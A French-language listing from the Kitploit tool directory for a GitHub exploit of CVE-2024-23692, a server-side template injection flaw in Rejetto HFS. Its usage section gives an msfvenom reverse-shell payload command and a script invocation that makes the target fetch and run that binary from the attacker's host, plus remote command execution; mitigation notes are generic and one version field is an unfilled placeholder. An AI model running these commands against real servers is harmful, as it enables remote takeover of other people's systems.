Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-23692 — Rejetto HFS (HTTP File Server) est un simple serveur de fichiers web qui facilite le partage de fichiers sur un réseau ou Internet. | Kitploit
Outils/GitHubGitHub/mr-r00t11/cve-2024-23692
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubmr-r00t11/cve-2024-23692

CVE-2024-23692

Rejetto HFS (HTTP File Server) est un simple serveur de fichiers web qui facilite le partage de fichiers sur un réseau ou Internet.

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Vulnérabilité CVE-2024-23692 dans Rejetto HFS (HTTP File Server)


Vue d'ensemble

Rejetto HFS (HTTP File Server) est un serveur de fichiers web simple qui facilite le partage de fichiers sur un réseau ou internet. Malgré sa facilité d'utilisation et sa simplicité, une vulnérabilité critique (CVE-2024-23692) a été découverte, faisant du serveur une cible pour les attaquants.


CVE-2024-23692 : Vulnérabilité d'injection de modèles côté serveur (SSTI)


Description

CVE-2024-23692 est une vulnérabilité d'injection de modèles côté serveur (SSTI) identifiée dans Rejetto HFS. Cette vulnérabilité permet à un attaquant d'injecter et d'exécuter des modèles malveillants sur le serveur. Si elle est exploitée, elle peut conduire à une exécution de code à distance, compromettant potentiellement l'ensemble du serveur et les données qu'il héberge.


Impact

Un attaquant exploitant cette vulnérabilité peut :

  • Exécuter du code arbitraire sur le serveur
  • Obtenir un accès non autorisé à des données sensibles
  • Compromettre l'intégrité et la disponibilité du serveur
  • Utiliser le serveur compromis pour lancer d'autres attaques au sein du réseau

Utilisation

Obtenez un shell en utilisant un binaire malveillant créé avec msfvenom.

Remarque : Laissez nc en écoute.

root@kitploit:~
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

Exécutez une commande à distance.

root@kitploit:~
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

L'affichage du résultat peut prendre environ 15 secondes.

[Screenshot_2.png]


Versions concernées

Toutes les versions de Rejetto HFS jusqu'à la version [insert latest vulnerable version here] inclus sont affectées par cette vulnérabilité.


Atténuation

Pour atténuer le risque posé par CVE-2024-23692, il est conseillé aux utilisateurs de :

  • Mettre à jour vers la dernière version : Assurez-vous d'utiliser une version de Rejetto HFS où cette vulnérabilité a été corrigée. Consultez le site officiel ou le dépôt de Rejetto HFS pour les dernières mises à jour.
  • Appliquer les bonnes pratiques de sécurité : Limitez l'accès au serveur HFS aux réseaux et utilisateurs de confiance uniquement. Utilisez des mécanismes d'authentification et d'autorisation forts.
  • Surveiller et auditer : Surveillez régulièrement le serveur pour toute activité inhabituelle et auditez les journaux à la recherche de signes d'exploitation.

Détection

Pour déterminer si votre serveur a été compromis, recherchez :

  • Un trafic réseau inhabituel en provenance du serveur
  • Des fichiers ou processus inattendus sur le serveur
  • Des modifications non autorisées des configurations ou des données du serveur

Signalement et assistance

Pour obtenir de l'aide et un soutien supplémentaires, référez-vous aux forums de la communauté Rejetto HFS ou aux canaux d'assistance officiels.


Ressources

  • Site officiel de Rejetto HFS
  • Détails de CVE-2024-23692

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.


Télécharger l’outil